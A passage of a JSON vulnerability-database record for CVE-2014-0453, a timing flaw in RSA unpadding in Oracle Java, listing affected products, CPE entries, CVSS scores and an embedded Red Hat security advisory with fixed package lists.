06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.14" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.051" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.051" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.61" }, { "model": "security key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.32" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.1" }, { "model": "cosminexus application server standard 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.1" }, { "model": "cosminexus application server enterprise 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-20" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ts7720 virtualization engine 3957-vea", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus application server enterprise 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "fabric manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.00.24" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "smartcloud provisioning fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "vcenter update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" } ], "sources": [ { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.8.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "15.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ibm:forms_viewer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.0.1.1", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:forms_viewer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.0.0.3", "versionStartIncluding": "4.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0453" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle", "sources": [ { "db": "BID", "id": "66914" } ], "trust": 0.3 }, "cve": "CVE-2014-0453", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-0453", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "VHN-67946", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0453", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201404-268", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-67946", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-0453", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027Security\u0027 sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Affects the confidentiality and integrity of data. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-ibm security update\nAdvisory ID: RHSA-2014:0486-01\nProduct: Red Hat Enterprise Linux Supplementary\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0486.html\nIssue date: 2014-05-13\nCVE Names: CVE-2013-6629 CVE-2013-6954 CVE-2014-0429 \n CVE-2014-0446 CVE-2014-0448 CVE-2014-0449 \n CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 \n CVE-2014-0454 CVE-2014-0455 CVE-2014-0457 \n CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 \n CVE-2014-0461 CVE-2014-1876 CVE-2014-2398 \n CVE-2014-2401 CVE-2014-2402 CVE-2014-2409 \n CVE-2014-2412 CVE-2014-2414 CVE-2014-2420 \n CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 \n CVE-2014-2428 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-ibm packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary. \n\nThe Red Hat Security Response Team has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64\nRed Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64\n\n3. Description:\n\nIBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit. \n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts\npage, listed in the References section. (CVE-2014-0457, CVE-2014-2421,\nCVE-2014-0429, CVE-2014-0461, CVE-2014-0455, CVE-2014-2428, CVE-2014-0448,\nCVE-2014-0454, CVE-2014-0446, CVE-2014-0452, CVE-2014-0451, CVE-2014-2402,\nCVE-2014-2423, CVE-2014-2427, CVE-2014-0458, CVE-2014-2414, CVE-2014-2412,\nCVE-2014-2409, CVE-2014-0460, CVE-2013-6954, CVE-2013-6629, CVE-2014-2401,\nCVE-2014-0449, CVE-2014-0459, CVE-2014-0453, CVE-2014-2398, CVE-2014-1876,\nCVE-2014-2420)\n\nAll users of java-1.7.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7 SR7 release. All running instances\nof IBM Java must be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory)\n1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335)\n1088024 - CVE-2014-0448 Oracle JDK: unspecified vulnerability fixed in 7u55 and 8u5 (Deployment)\n1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D)\n1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 5):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\n\nppc:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm\n\ns390x:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 6):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6):\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 6):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\n\nppc64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm\n\ns390x:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Supplementary (v. 6):\n\ni386:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm\n\nx86_64:\njava-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\njava-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. 